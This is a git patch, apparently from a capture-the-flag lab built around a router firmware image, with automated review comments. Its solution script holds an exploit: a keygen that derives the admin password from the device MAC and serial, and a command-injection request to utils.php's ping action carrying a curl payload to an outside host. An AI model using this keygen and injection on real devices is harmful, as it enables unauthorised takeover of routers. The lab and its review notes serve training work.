From 919a275fe33ae8dd5a03c9d6d88c2cba248c000c Mon Sep 17 00:00:00 2001
From: Giulio
Date: Wed, 23 Sep 2020 11:13:38 +0200
Subject: [PATCH] DNS is useless; fix tar path in update.sh
---
 buildroot/board/tiesse/tgr/permissions.config | 2 +-
 conf/etc/dhcp/dhcpd.conf | 2 +-
 solution/solution.py | 81 ++++++++++---------
 update/update.sh | 2 +-
 4 files changed, 44 insertions(+), 43 deletions(-)
diff --git a/buildroot/board/tiesse/tgr/permissions.config b/buildroot/board/tiesse/tgr/permissions.config
index d326a35..bd7b03d 100644
--- a/buildroot/board/tiesse/tgr/permissions.config
+++ b/buildroot/board/tiesse/tgr/permissions.config
@@ -4,4 +4,4 @@
 /update.sh f 755 root root - - - - -
 /root/ d 700 root root - - - - -
 /root/.ssh/ d 700 root root - - - - -
-/root/.ssh/authorized_keys 644 root root - - - - -
+/root/.ssh/authorized_keys f 644 root root - - - - -
diff --git a/conf/etc/dhcp/dhcpd.conf b/conf/etc/dhcp/dhcpd.conf
index b8bcf8b..b206c23 100644
--- a/conf/etc/dhcp/dhcpd.conf
+++ b/conf/etc/dhcp/dhcpd.conf
@@ -1,6 +1,6 @@
 default-lease-time 600;
 max-lease-time 14400;
-option domain-name-servers 1.1.1.1;
+#option domain-name-servers 1.1.1.1;
 option subnet-mask 255.255.255.0;
 option broadcast-address 192.168.77.255;
diff --git a/solution/solution.py b/solution/solution.py
index 54b2161..f7a4146 100644
--- a/solution/solution.py
+++ b/solution/solution.py
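Review bot: `/root/.ssh/authorized_keys` is still installed with mode 644 in buildroot/board/tiesse/tgr/permissions.config; the type field this hunk adds makes the row well-formed, but `600` is the conventional mode for that file. The 700 on `/root/` and `/root/.ssh/` in the context lines already keeps other users away from it, so this is defence in depth rather than an open exposure; the row would read `/root/.ssh/authorized_keys f 600 root root - - - - -`. If the table format accepts `#` comments, a header line naming the columns (path, type, mode, owner, group, ...) would make a dropped field like the one corrected here easier to spot.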
@@ -1,40 +1,41 @@
-import requests
-import hashlib
-
-def xorshift(x, y, z, w):
- t = x
- t = t ^ ((t << 11) & 0xFFFFFFFF)
- t = t ^ (t >> 8)
- x, y, z = y, z, w
- w = (w ^ (w >> 19)) ^ t
- return x, y, z, w, t
-
-def keygen(mac, serial):
- l = 20
- password = ""
- md5a = hashlib.md5(mac).hexdigest()
- md5b = hashlib.md5(serial).hexdigest()
- w = int(md5a[0:8], 16)
- x = int(md5a[8:16], 16)
- y = int(md5a[16:24], 16)
- z = int(md5a[24:32], 16)
-
- for i in range(0, l):
- x, y, z, w, t = xorshift(x, y, z, w)
- password += md5b[t % 20]
-
- return password
-
-def rce(username, password, host, payload):
- requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))})
-
-def main():
- serial = "D7F2959E8EE66CC06CB67C0D2B835273".encode("ascii")
- mac = "ac:35:ee:ad:29:1b".encode("ascii")
- host = "192.168.77.1"
- payload = "curl 192.168.1.2:8080"
- password = keygen(mac, serial)
- print(password)
- #rce("admin", password, host, payload)
-
-main()
\ No newline at end of file
+import requests
+import hashlib
+import sys
+
+def xorshift(x, y, z, w):
+ t = x
+ t = t ^ ((t << 11) & 0xFFFFFFFF)
+ t = t ^ (t >> 8)
+ x, y, z = y, z, w
+ w = (w ^ (w >> 19)) ^ t
+ return x, y, z, w, t
+
+def keygen(mac, serial):
+ l = 20
+ password = ""
+ md5a = hashlib.md5(mac).hexdigest()
+ md5b = hashlib.md5(serial).hexdigest()
+ w = int(md5a[0:8], 16)
+ x = int(md5a[8:16], 16)
+ y = int(md5a[16:24], 16)
+ z = int(md5a[24:32], 16)
+
+ for i in range(0, l):
+ x, y, z, w, t = xorshift(x, y, z, w)
+ password += md5b[t % 20]
+
+ return password
+
+def rce(username, password, host, payload):
+ requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))})
+
+def main():
+ serial = sys.argv[1].encode("ascii")
+ mac = sys.argv[2].encode("ascii")
+ host = "192.168.77.1"
+ payload = "curl 192.168.77.10:8080"
+ password = keygen(mac, serial)
+ print(password)
+ #rce("admin", password, host, payload)
+
+main()
diff --git a/update/update.sh b/update/update.sh
index d1af4aa..b3e5260 100755
--- a/update/update.sh
+++ b/update/update.sh
@@ -32,7 +32,7 @@ if [ "$check" == "Verified OK" ]
 then
 /bin/echo "[+] Signature is valid!"
 /bin/echo "[+] Upgrading..."
- /usr/bin/tar -xvzf /tmp/update.tgz.cc -C /
+ /bin/tar -xvzf /tmp/update.tgz.cc -C /
 /bin/rm /tmp/update.tgz.cc /tmp/sig
 /bin/echo "[+] Done"
 exit 0
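Review bot: `main()` in solution/solution.py now indexes `sys.argv[1]` and `sys.argv[2]` without checking how many arguments were passed, so a run with fewer than two ends in a bare IndexError with no hint of what is expected. The order is also easy to get wrong: the command line takes the serial first and the MAC second, while `keygen(mac, serial)` takes them the other way round, and swapped values still produce a password silently. A guard at the top of `main()` such as `if len(sys.argv) != 3: sys.exit("usage: solution.py <serial> <mac>")` documents both. The hunk rewrites every line of the file, most likely a line-ending or whitespace change, which hides that only the new import, these two assignments and the payload address differ.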
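Review bot: The exit status of the `tar` call in update/update.sh is never checked, so the script prints `[+] Done` and exits 0 even when extraction fails; that is presumably how the wrong `/usr/bin/tar` path went unnoticed until this commit. Guarding the call, for example `/bin/tar -xzf /tmp/update.tgz.cc -C / || { /bin/echo "[-] Extraction failed"; exit 1; }`, makes a failed upgrade visible to the caller. Separately, the archive is unpacked over `/` from a fixed name in `/tmp` after the signature check; the verification command is outside this hunk, but if anything other than root can write that path between the check and the extraction, the bytes unpacked are not necessarily the bytes verified, so a root-only staging directory is the safer place for it.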